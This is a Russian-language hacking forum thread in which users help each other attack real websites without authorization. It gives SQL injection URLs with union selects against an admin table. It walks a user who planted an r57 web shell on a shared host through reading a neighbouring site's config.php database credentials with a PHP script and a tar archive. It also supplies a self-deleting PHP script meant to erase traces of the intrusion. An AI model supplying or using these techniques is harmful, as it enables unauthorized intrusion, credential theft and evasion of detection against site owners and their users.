да, 100%, иначе group_concat вытащил бы несколько записей по любому и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.
Я что-то пропустил. или count() отменили? ) Разве так не проще? http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--
jokester Если не ошибаюсь, то count() и null ячейки будет считать,и пустые. Например покажет, что записей 25, а будет всего 3, остальные пустые.Но он их посчитает.
Для начала всех с наступающим новым годом )) Теперь вопрос. Поимел шелл на серваке, не на том сайте, который мне нужен,но надеясь получить к нему доступ. Safe_mode оказался: OFF Нахожусь в директории где шелл (путь) /home/s/site/site.com/public/www/admin/ При попытке перейти в директорию /home/ редиректит назад на /home/s/site/site.com/public/www/admin/ Шелл (r57shell v.1.42) Если выполняю команду ls -la /home/ переходит удачно и всё показывает. Так добрался до нужного мне сайта ls -la /home/t/target/target.com/public/www/ Там нашёл файл config.php, с данными для коннекта к бд. Как мне его прочитать? Скачать не получилось Ввожу в :: Download files from server :: путь к файлу /home/t/target/target.com/public/www/config.php редиректит назад в директорию с шеллом. Если выполняю команду more /home/t/target/target.com/public/www/config.php или more config.php выдаёт пустой экран в шелле. Что делать? Я почти неделю убил на поиск уязвимостей, и тут такой облом :'( Вот стат с шелла PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: ON mSQL: OFF SQLite: ON Safe_mode: OFF Open_basedir: VIRTUAL_DOCUMENT_ROOT:/usr/local/lib/php:/usr/local/lib/ph:/home/sys/phplib/:/usr/local/bin/ Safe_exec_dir: /usr/local/php/bin Safe_gid: OFF Safe_include_dir: NONE Sql.safe_mode: OFF Disable functions : NONE Free space : 0 B Total space: 0 B Useful: mod_include(SSI) Dangerous: - Downloaders: fopen И ещё вопрос. Все сайты на одном серваке, но на многих PHP version: 5.2.6 а на некотрых четвёртая. (в том числе и на том, на который я залил шелл) Как так? Помогите прочитать файл плз (или скачать его).Очень прошу.
Попробовать сделать так - написать и залить туда такой скрипт: PHP: <? $file = file_get_contents("абсолютный_путь_к_файлу"); if(!file) echo 'Ошибка открытия файла'; else echo $file; ?>
2 Pashkela + 2 Imperou$ Если не выйдет-из папки с шеллом выполняем tar -czvf arch.tar.gz /home/t/target/target.com/public/www/ можешь и файл вписать. Cоздаст архив arch.tar.gz в папке с шеллом, внутри будет необходимое тебе содержание.Просто скачай и смотри.
Хыыы... Теперь у меня вопрос =) Нифига не могу удалить через шелл с сервака свои залитые файлы. Т.е. залить любой могу, а вот удалить нет. Ни rm rm -r rm -f rm -rf Не помогают =( Вопрос, как быть? Снести надо сроооочно, иначе ппц паливо устроят.
2 ThreeD: http://ru2.php.net/manual/ru/function.chown.php http://ru2.php.net/manual/ru/function.chmod.php Главное: http://ru2.php.net/unlink 2 Imperou$: PHP: is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2 вообще-то это тот сервер, где ты сейчас со своим шеллом сидишь, возьми да поправь
Делаешь такой скрипт, обзываешь его del.php к примеру, заливаешь на сайт: PHP: <? unlink ('абсолютный_путь_ до_файла/то_что хотим_удалить'); unlink ('абсолютный_путь_ до_файла/del.php'); //Самоудаляемся, не оставляем вообще никаких следов, кроме как в логах фтп и прочих ?> запускаешь
Pashkela Я залил скрипт 1.php с таким содержанием PHP: <? $file = file_get_contents("/home/t/target/target.com/public/www/config.php"); if(!file) echo 'Ошибка открытия файла'; else echo $file; ?> на серв /home/s/site/site.com/public/www/ Что поменять??
2 Imperou$: PHP: in /home/s/site/site.com/public/www/1.php on line 2 Забей, юзай способ от ThreeD, только в конце укажи название файла, а не просто директорию
Народ есть sql inj. Определяю через group by что количество столбцов 5. Но когда пытаюсь использовать id=1'+union+select+1,2,3,4,5/* говорит Query failed: The used SELECT statements have a different number of columns хотя group by говорит что их именно 5. В чем может быть проблема? На запрос id=1' получаю ответ Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' ORDER BY issue_date DESC LIMIT 1' at line 3 Такое впечатление что injection тут после ORDER BY. Но что то я не могу найти где подробней про нее почитать. Может кто подскажет ?
Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj